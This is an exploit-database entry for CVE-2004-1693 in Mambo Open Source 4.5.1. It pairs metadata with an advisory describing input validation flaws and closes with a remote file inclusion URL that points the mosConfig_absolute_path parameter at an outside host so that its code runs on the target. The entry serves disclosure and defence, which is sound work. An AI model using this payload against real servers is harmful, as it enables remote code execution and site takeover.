[] NeoSense

Mambo Open Source 4.5.1 (1.0.9) - 'Function.php' Arbitrary Command Execution

Author: Joxean Koret
type: webapps
platform: php
port: 
date_added: 2004-09-20 
date_updated: 2013-03-06 
verified: 1 
codes: CVE-2004-1693;OSVDB-10180 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/11220/info

Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer, to carry out cross-site scripting attacks, and to make SLQ injection attacks against the vulnerable application.

http://www.example.com/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://www.example.org/